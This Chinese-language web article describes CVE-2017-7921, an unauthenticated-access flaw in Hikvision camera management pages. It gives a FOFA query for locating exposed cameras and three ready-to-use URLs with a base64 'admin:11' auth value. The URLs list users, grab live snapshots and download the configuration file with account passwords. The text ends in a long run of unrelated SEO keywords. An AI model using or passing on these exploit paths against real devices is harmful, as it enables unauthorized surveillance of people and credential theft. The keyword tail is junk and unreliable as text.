千家信息网

如何进行CVE-2017-7921的漏洞分析

发表于:2024-11-13 作者:千家信息网编辑
千家信息网最后更新 2024年11月13日,如何进行CVE-2017-7921的漏洞分析,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。一、漏洞概述:杭州海康威视系统技术有限公司
千家信息网最后更新 2024年11月13日如何进行CVE-2017-7921的漏洞分析

如何进行CVE-2017-7921的漏洞分析,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。

一、漏洞概述:

杭州海康威视系统技术有限公司摄像头管理后台存在未授权,通过构造url可绕过登录查看监控,检索所有用户和配置文件下载。

fofa网址:fofa.so

fofa搜索:app="HIKVISION-视频监控"

二、漏洞利用:

1、利用路径:

http://your-ip/Security/users?auth=YWRtaW46MTEK

YWRtaW46MTEKadmin:11的base64编码

检索所有用户及其角色的列表。

2、利用路径:

http://your-ip/onvif-http/snapshot?auth=YWRtaW46MTEK

获取监控快照,不进行身份验证。

3、利用路径:

http://your-ip/System/configurationFile?auth=YWRtaW46MTEK

下载摄像头配置账号密码文件。

关于如何进行CVE-2017-7921的漏洞分析问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注行业资讯频道了解更多相关知识。

漏洞 分析 路径 问题 监控 漏洞分析 摄像头 文件 更多 用户 帮助 摄像 检索 解答 配置 易行 简单易行 公司 内容 后台 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 网络安全诈骗活动总结 服务器时间显示错误 数据库er图要用到所有表吗 青浦区通用软件开发服务不二之选 嵌入式web服务器移植 数据库使用方法 乔家大院下载软件开发 小学生网络安全的意义 黄浦区智能化软件开发厂家是什么 陕西5g软件开发培训学校 陈荣峰 网络安全专家 物业管理数据库设计 给支付宝网络技术公司转账 软件开发培训吧 测试服务器支持tcp最大连接数 服务器搭建网站哪个更安全 收费站网络安全预案 ftp服务器软件使用方法 扬州市互联网新科技 美国远程桌面服务器地址 在公安局网络安全部门 软件开发公司年会演讲稿 网络安全保险公司数字化 数据库是目前最为流行的什么数 海南省委宣传部网络安全 河南周口互联网服务器 软件开发专业技能自我评价 表格中怎么选中一列数据库 计算机网络技术饱和 软件开发错误有哪些问题
0